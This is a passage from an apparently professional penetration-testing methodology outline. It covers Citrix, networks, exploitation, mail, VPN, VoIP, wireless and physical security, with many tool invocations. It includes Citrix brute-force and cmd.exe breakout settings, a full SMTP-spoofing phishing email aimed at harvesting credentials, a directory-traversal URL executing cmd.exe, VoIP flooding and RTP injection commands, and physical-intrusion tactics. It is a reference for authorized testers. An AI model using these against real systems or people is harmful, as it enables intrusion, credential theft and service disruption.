22.2.5.1.3. Citrix SSL Relay
22.2.5.1.4. ICA sessions
22.2.5.1.5. Server to server
22.2.5.1.6. Management Console to server
22.2.5.1.7. Session Reliability (Auto-reconnect)
22.2.5.1.8. License Management Console
22.2.5.1.9. License server
22.2.5.2. UDP
22.2.5.2.1. Clients to ICA browser service
22.2.5.2.2. Server-to-server
22.2.6. nmap nse scripts
22.2.6.1. citrix-enum-apps
22.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
22.2.6.2. citrix-enum-apps-xml
22.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
22.2.6.3. citrix-enum-servers
22.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
22.2.6.4. citrix-enum-servers-xml
22.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
22.2.6.5. citrix-brute-xml
22.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
22.3. Scanning
22.3.1. Nessus
22.3.1.1. Plugins
22.3.1.1.1. CGI abuses
22.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
22.3.1.1.3. Misc.
22.3.1.1.4. Service Detection
22.3.1.1.5. Web Servers
22.3.1.1.6. Windows
22.3.2. Nikto
22.3.2.1. perl nikto.pl -host ip_address -port port_no.
22.3.2.1.1. Untitled
22.4. Exploitation
22.4.1. Alter default .ica files
22.4.1.1. InitialProgram=cmd.exe
22.4.1.2. InitialProgram=explorer.exe
22.4.2. Enumerate and Connect
22.4.2.1. For applications identified by Citrix-pa-scan
22.4.2.1.1. Pas
22.4.2.2. For published applications with a Citrix client when the master browser is non-public.
22.4.2.2.1. Citrix-pa-proxy
22.5. Brute Force
22.5.1. bforce.js
22.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
22.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
22.5.1.3. Untitled
22.6. Review Configuration Files
22.6.1. Application server configuration file
22.6.1.1. appsrv.ini
22.6.1.1.1. Location
22.6.1.1.2. World writeable
22.6.1.1.3. Review other files
22.6.1.1.4. Sample file
22.6.2. Program Neighborhood configuration file
22.6.2.1. pn.ini
22.6.2.1.1. Location
22.6.2.1.2. Review other files
22.6.2.1.3. Sample file
22.6.3. Citrix ICA client configuration file
22.6.3.1. wfclient.ini
22.6.3.1.1. Location
22.7. References
22.7.1. Vulnerabilities
22.7.1.1. Art of Hacking
22.7.1.2. Common Vulnerabilities and Exploits (CVE)
22.7.1.2.1. Sample file
22.7.1.2.2. Untitled
22.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
22.7.1.3. OSVDB
22.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
22.7.1.4. Secunia
22.7.1.5. Security-database.com
22.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
22.7.1.6. SecurityFocus
22.7.2. Support
22.7.2.1. Citrix
22.7.2.1.1. Knowledge Base
22.7.2.2. Thinworld
22.7.3. Exploits
22.7.3.1. Milw0rm
22.7.3.1.1. http://www.milw0rm.com/search.php
22.7.3.2. Art of Hacking
22.7.3.2.1. Citrix
22.7.4. Tools Resource
22.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
23. Network Backbone
23.1. Generic Toolset
23.1.1. Wireshark (Formerly Ethereal)
23.1.1.1. Passive Sniffing
23.1.1.1.1. Usernames/Passwords
23.1.1.1.2. Email
23.1.1.1.3. FTP
23.1.1.1.4. HTTP
23.1.1.1.5. HTTPS
23.1.1.1.6. RDP
23.1.1.1.7. VOIP
23.1.1.1.8. Other
23.1.1.2. Filters
23.1.1.2.1. ip.src == ip_address
23.1.1.2.2. ip.dst == ip_address
23.1.1.2.3. tcp.dstport == port_no.
23.1.1.2.4. ! ip.addr == ip_address
23.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
23.1.2. Cain & Abel
23.1.2.1. Active Sniffing
23.1.2.1.1. ARP Cache Poisoning
23.1.2.1.2. DNS Poisoning
23.1.2.1.3. Routing Protocols
23.1.3. Cisco-Torch
23.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
23.1.4. NTP-Fingerprint
23.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
23.1.5. Yersinia
23.1.6. p0f
23.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
23.1.7. Manual Check (Credentials required)
23.1.8. MAC Spoofing
23.1.8.1. mac address changer for windows
23.1.8.2. macchanger
23.1.8.2.1. Random Mac Address:- macchanger -r eth0
23.1.8.3. madmacs
23.1.8.4. smac
23.1.8.5. TMAC
24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
24.1. Password Attacks
24.1.1. Known Accounts
24.1.1.1. Identified Passwords
24.1.1.2. Unidentified Hashes
24.1.2. Default Accounts
24.1.2.1. Identified Passwords
24.1.2.2. Unidentified Hashes
24.2. Exploits
24.2.1. Successful Exploits
24.2.1.1. Accounts
24.2.1.1.1. Passwords
24.2.1.1.2. Groups
24.2.1.1.3. Other Details
24.2.1.2. Services
24.2.1.3. Backdoor
24.2.1.4. Connectivity
24.2.2. Unsuccessful Exploits
24.2.3. Resources
24.2.3.1. Securiteam
24.2.3.1.1. Exploits are sorted by year and must be downloaded individually
24.2.3.2. SecurityForest
24.2.3.2.1. Updated via CVS after initial install
24.2.3.3. GovernmentSecurity
24.2.3.3.1. Need to create and account to obtain access
24.2.3.4. Red Base Security
24.2.3.4.1. Oracle Exploit site only
24.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
24.2.3.5.1. Wireless Exploit Site
24.2.3.6. PacketStorm Security
24.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
24.2.3.7. SecWatch
24.2.3.7.1. Exploits sorted by year and month, download seperately
24.2.3.8. SecurityFocus
24.2.3.8.1. Exploits must be downloaded individually
24.2.3.9. Metasploit
24.2.3.9.1. Install and regualrly update via svn
24.2.3.10. Milw0rm
24.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
24.3. Tools
24.3.1. Metasploit
24.3.1.1. Free Extra Modules
24.3.1.1.1. local copy
24.3.2. Manual SQL Injection
24.3.2.1. Understanding SQL Injection
24.3.2.2. SQL Injection walkthrough
24.3.2.3. SQL Injection by example
24.3.2.4. Blind SQL Injection
24.3.2.5. Advanced SQL Injection in SQL Server
24.3.2.6. More Advanced SQL Injection
24.3.2.7. Advanced SQL Injection in Oracle databases
24.3.2.8. SQL Cheatsheets
24.3.2.8.1. Untitled
24.3.3. SQL Power Injector
24.3.4. SecurityForest
24.3.5. SPI Dynamics WebInspect
24.3.6. Core Impact
24.3.7. Cisco Global Exploiter
24.3.8. PIXDos
24.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
24.3.9. CANVAS
24.3.10. Inguma
25. Server Specific Tests
25.1. Databases
25.1.1. Direct Access Interrogation
25.1.1.1. MS SQL Server
25.1.1.1.1. Ports
25.1.1.1.2. Version
25.1.1.1.3. osql
25.1.1.2. Oracle
25.1.1.2.1. Ports
25.1.1.2.2. TNS Listener
25.1.1.2.3. SQL Plus
25.1.1.2.4. Default Account/Passwords
25.1.1.2.5. Default SID's
25.1.1.3. MySQL
25.1.1.3.1. Ports
25.1.1.3.2. Version
25.1.1.3.3. Users/Passwords
25.1.1.4. DB2
25.1.1.5. Informix
25.1.1.6. Sybase
25.1.1.7. Other
25.1.2. Scans
25.1.2.1. Default Ports
25.1.2.2. Non-Default Ports
25.1.2.3. Instance Names
25.1.2.4. Versions
25.1.3. Password Attacks
25.1.3.1. Sniffed Passwords
25.1.3.1.1. Cracked Passwords
25.1.3.1.2. Hashes
25.1.3.2. Direct Access Guesses
25.1.4. Vulnerability Assessment
25.1.4.1. Automated
25.1.4.1.1. Reports
25.1.4.1.2. Vulnerabilities
25.1.4.2. Manual
25.1.4.2.1. Patch Levels
25.1.4.2.2. Confirmed Vulnerabilities
25.2. Mail
25.2.1. Scans
25.2.2. Fingerprint
25.2.2.1. Manual
25.2.2.2. Automated
25.2.3. Spoofable
25.2.3.1. Telnet spoof
25.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]
25.2.4. Relays
25.3. VPN
25.3.1. Scanning
25.3.1.1. 500 UDP IPSEC
25.3.1.2. 1723 TCP PPTP
25.3.1.3. 443 TCP/SSL
25.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
25.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
25.3.2. Fingerprinting
25.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
25.3.3. PSK Crack
25.3.3.1. ikeprobe 80.75.68.27
25.3.3.2. sniff for responses with C&A or ikecrack
25.4. Web
25.4.1. Vulnerability Assessment
25.4.1.1. Automated
25.4.1.1.1. Reports
25.4.1.1.2. Vulnerabilities
25.4.1.2. Manual
25.4.1.2.1. Patch Levels
25.4.1.2.2. Confirmed Vulnerabilities
25.4.2. Permissions
25.4.2.1. PUT /test.txt HTTP/1.0
25.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
25.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
25.4.3. Scans
25.4.4. Fingerprinting
25.4.4.1. Other
25.4.4.2. HTTP
25.4.4.2.1. Commands
25.4.4.2.2. Modules
25.4.4.2.3. File Extensions
25.4.4.3. HTTPS
25.4.4.3.1. Commands
25.4.4.3.2. Commands
25.4.4.3.3. File Extensions
25.4.5. Directory Traversal
25.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
26. VoIP Security
26.1. Sniffing Tools
26.1.1. AuthTool
26.1.2. Cain & Abel
26.1.3. Etherpeek
26.1.4. NetDude
26.1.5. Oreka
26.1.6. PSIPDump
26.1.7. SIPomatic
26.1.8. SIPv6 Analyzer
26.1.9. UCSniff
26.1.10. VoiPong
26.1.11. VOMIT
26.1.12. Wireshark
26.1.13. WIST - Web Interface for SIP Trace
26.2. Scanning and Enumeration Tools
26.2.1. enumIAX
26.2.2. fping
26.2.3. IAX Enumerator
26.2.4. iWar
26.2.5. Nessus
26.2.6. Nmap
26.2.7. SIP Forum Test Framework (SFTF)
26.2.8. SIPcrack
26.2.9. sipflanker
26.2.9.1. python sipflanker.py 192.168.1-254
26.2.10. SIP-Scan
26.2.11. SIP.Tastic
26.2.12. SIPVicious
26.2.13. SiVuS
26.2.14. SMAP
26.2.14.1. smap IP_Address/Subnet_Mask
26.2.14.2. smap -o IP_Address/Subnet_Mask
26.2.14.3. smap -l IP_Address
26.2.15. snmpwalk
26.2.16. VLANping
26.2.17. VoIPAudit
26.2.18. VoIP GHDB Entries
26.2.19. VoIP Voicemail Database
26.3. Packet Creation and Flooding Tools
26.3.1. H.323 Injection Files
26.3.2. H225regreject
26.3.3. IAXHangup
26.3.4. IAXAuthJack
26.3.5. IAX.Brute
26.3.6. IAXFlooder
26.3.6.1. ./iaxflood sourcename destinationname numpackets
26.3.7. INVITE Flooder
26.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
26.3.8. kphone-ddos
26.3.9. RTP Flooder
26.3.10. rtpbreak
26.3.11. Scapy
26.3.12. Seagull
26.3.13. SIPBomber
26.3.14. SIPNess
26.3.15. SIPp
26.3.16. SIPsak
26.3.16.1. Tracing paths: - sipsak -T -s sip:[email protected]
26.3.16.2. Options request:- sipsak -vv -s sip:[email protected]
26.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username[email protected]
26.3.17. SIP-Send-Fun
26.3.18. SIPVicious
26.3.19. Spitter
26.3.20. TFTP Brute Force
26.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
26.3.21. UDP Flooder
26.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
26.3.22. UDP Flooder (with VLAN Support)
26.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
26.3.23. Voiphopper
26.4. Fuzzing Tools
26.4.1. Asteroid
26.4.2. Codenomicon VoIP Fuzzers
26.4.3. Fuzzy Packet
26.4.4. Mu Security VoIP Fuzzing Platform
26.4.5. ohrwurm RTP Fuzzer
26.4.6. PROTOS H.323 Fuzzer
26.4.7. PROTOS SIP Fuzzer
26.4.8. SIP Forum Test Framework (SFTF)
26.4.9. Sip-Proxy
26.5. Signaling Manipulation Tools
26.5.1. AuthTool
26.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
26.5.2. BYE Teardown
26.5.3. Check Sync Phone Rebooter
26.5.4. RedirectPoison
26.5.5. Registration Adder
26.5.6. Registration Eraser
26.5.7. Registration Hijacker
26.5.8. SIP-Kill
26.5.9. SIP-Proxy-Kill
26.5.10. SIP-RedirectRTP
26.5.11. vnak
26.6. Media Manipulation Tools
26.6.1. RTP InsertSound
26.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
26.6.2. RTP MixSound
26.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
26.6.3. RTPProxy
26.6.4. RTPInject
26.7. Generic Software Suites
26.7.1. OAT Office Communication Server Tool Assessment
26.7.2. EnableSecurity VOIPPACK
26.7.2.1. Note: - Add-on for Immunity Canvas
26.8. References
26.8.1. URL's
26.8.1.1. Common Vulnerabilities and Exploits (CVE)
26.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
26.8.1.2. Default Passwords
26.8.1.3. Hacking Exposed VoIP
26.8.1.3.1. Tool Pre-requisites
26.8.1.4. VoIPsa
26.8.2. White Papers
26.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
26.8.2.2. An Analysis of VoIP Security Threats and Tools
26.8.2.3. Hacking VoIP Exposed
26.8.2.4. Security testing of SIP implementations
26.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
26.8.2.6. Two attacks against VoIP
26.8.2.7. VoIP Attacks!
26.8.2.8. VoIP Security Audit Program (VSAP)
26.8.3. Spirent ThreatEx
27. Wireless Penetration
27.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
27.1.1. Site Map
27.1.1.1. RF Map
27.1.1.1.1. Lines of Sight
27.1.1.1.2. Signal Coverage
27.1.1.2. Physical Map
27.1.1.2.1. Triangulate APs
27.1.1.2.2. Satellite Imagery
27.1.2. Network Map
27.1.2.1. MAC Filter
27.1.2.1.1. Authorised MAC Addresses
27.1.2.1.2. Reaction to Spoofed MAC Addresses
27.1.2.2. Encryption Keys utilised
27.1.2.2.1. WEP
27.1.2.2.2. WPA/PSK
27.1.2.2.3. 802.1x
27.1.2.3. Access Points
27.1.2.3.1. ESSID
27.1.2.3.2. BSSIDs
27.1.2.4. Wireless Clients
27.1.2.4.1. MAC Addresses
27.1.2.4.2. Intercepted Traffic
27.2. SipRogue
27.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
27.4. Wireless Toolkit
27.4.1. Wireless Discovery
27.4.1.1. Aerosol
27.4.1.2. Airfart
27.4.1.3. Aphopper
27.4.1.4. Apradar
27.4.1.5. BAFFLE
27.4.1.6. inSSIDer
27.4.1.7. iWEPPro
27.4.1.8. karma
27.4.1.9. KisMAC-ng
27.4.1.10. Kismet
27.4.1.11. MiniStumbler
27.4.1.12. Netstumbler
27.4.1.13. Vistumbler
27.4.1.14. Wellenreiter
27.4.1.15. Wifi Hopper
27.4.1.16. WirelessMon
27.4.1.17. WiFiFoFum
27.4.2. Packet Capture
27.4.2.1. Airopeek
27.4.2.2. Airpcap
27.4.2.3. Airtraf
27.4.2.4. Apsniff
27.4.2.5. Cain
27.4.2.6. Commview
27.4.2.7. Ettercap
27.4.2.8. Netmon
27.4.2.8.1. nmwifi
27.4.2.9. Wireshark
27.4.3. EAP Attack tools
27.4.3.1. eapmd5pass
27.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
27.4.3.1.2. Untitled
27.4.4. Leap Attack Tools
27.4.4.1. asleap
27.4.4.2. thc leap cracker
27.4.4.3. anwrap
27.4.5. WEP/ WPA Password Attack Tools
27.4.5.1. Airbase
27.4.5.2. Aircrack-ptw
27.4.5.3. Aircrack-ng
27.4.5.4. Airsnort
27.4.5.5. cowpatty
27.4.5.6. FiOS Wireless Key Calculator
27.4.5.7. iWifiHack
27.4.5.8. KisMAC-ng
27.4.5.9. Rainbow Tables
27.4.5.10. wep attack
27.4.5.11. wep crack
27.4.5.12. wzcook
27.4.6. Frame Generation Software
27.4.6.1. Airgobbler
27.4.6.2. airpwn
27.4.6.3. Airsnarf
27.4.6.4. Commview
27.4.6.5. fake ap
27.4.6.6. void 11
27.4.6.7. wifi tap
27.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
27.4.6.8. FreeRADIUS - Wireless Pwnage Edition
27.4.7. Mapping Software
27.4.7.1. Online Mapping
27.4.7.1.1. WIGLE
27.4.7.1.2. Skyhook
27.4.7.2. Tools
27.4.7.2.1. Knsgem
27.4.8. File Format Conversion Tools
27.4.8.1. ns1 recovery and conversion tool
27.4.8.2. warbable
27.4.8.3. warkizniz
27.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
27.4.8.4. ivstools
27.4.9. IDS Tools
27.4.9.1. WIDZ
27.4.9.2. War Scanner
27.4.9.3. Snort-Wireless
27.4.9.4. AirDefense
27.4.9.5. AirMagnet
27.5. WLAN discovery
27.5.1. Unencrypted WLAN
27.5.1.1. Visible SSID
27.5.1.1.1. Sniff for IP range
27.5.1.2. Hidden SSID
27.5.1.2.1. Deauth client
27.5.2. WEP encrypted WLAN
27.5.2.1. Visible SSID
27.5.2.1.1. WEPattack
27.5.2.2. Hidden SSID
27.5.2.2.1. Deauth client
27.5.3. WPA / WPA2 encrypted WLAN
27.5.3.1. Deauth client
27.5.3.1.1. Capture EAPOL handshake
27.5.4. LEAP encrypted WLAN
27.5.4.1. Deauth client
27.5.4.1.1. Break LEAP
27.5.5. 802.1x WLAN
27.5.5.1. Create Rogue Access Point
27.5.5.1.1. Airsnarf
27.5.5.1.2. fake ap
27.5.5.1.3. Hotspotter
27.5.5.1.4. Karma
27.5.5.1.5. Linux rogue AP
27.5.6. Resources
27.5.6.1. URL's
27.5.6.1.1. Wirelessdefence.org
27.5.6.1.2. Russix
27.5.6.1.3. Wardrive.net
27.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
27.5.6.2. White Papers
27.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
27.5.6.2.2. 802.11b Firmware-Level Attacks
27.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
27.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
27.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds
27.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
27.5.6.2.7. Active behavioral fingerprinting of wireless devices
27.5.6.3. Common Vulnerabilities and Exploits (CVE)
27.5.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
28. Physical Security
28.1. Building Security
28.1.1. Meeting Rooms
28.1.1.1. Check for active network jacks.
28.1.1.2. Check for any information in room.
28.1.2. Lobby
28.1.2.1. Check for active network jacks.
28.1.2.2. Does receptionist/guard leave lobby?
28.1.2.3. Accessbile printers? Print test page.
28.1.2.4. Obtain phone/personnel listing.
28.1.3. Communal Areas
28.1.3.1. Check for active network jacks.
28.1.3.2. Check for any information in room.
28.1.3.3. Listen for employee conversations.
28.1.4. Room Security
28.1.4.1. Resistance of lock to picking.
28.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
28.1.4.2. Ceiling access areas.
28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
28.1.5. Windows
28.1.5.1. Check windows/doors for visible intruderalarm sensors.
28.1.5.2. Check visible areas for sensitive information.
28.1.5.3. Can you video users logging on?
28.2. Perimeter Security
28.2.1. Fence Security
28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
28.2.2. Exterior Doors
28.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
28.2.3. Guards
28.2.3.1. Patrol Routines
28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
28.2.3.2. Communications
28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
28.3. Entry Points
28.3.1. Guarded Doors
28.3.1.1. Piggybacking
28.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
28.3.1.2. Fake ID
28.3.1.2.1. Attempt to use fake ID to gain access.
28.3.1.3. Access Methods
28.3.1.3.1. Test 'out of hours' entry methods
28.3.2. Unguarded Doors
28.3.2.1. Identify all unguardedentry points.
28.3.2.1.1. Are doors secured?
28.3.2.1.2. Check locks for resistance to lock picking.
28.3.3. Windows
28.3.3.1. Check windows/doors for visible intruderalarm sensors.
28.3.3.1.1. Attempt to bypass sensors.
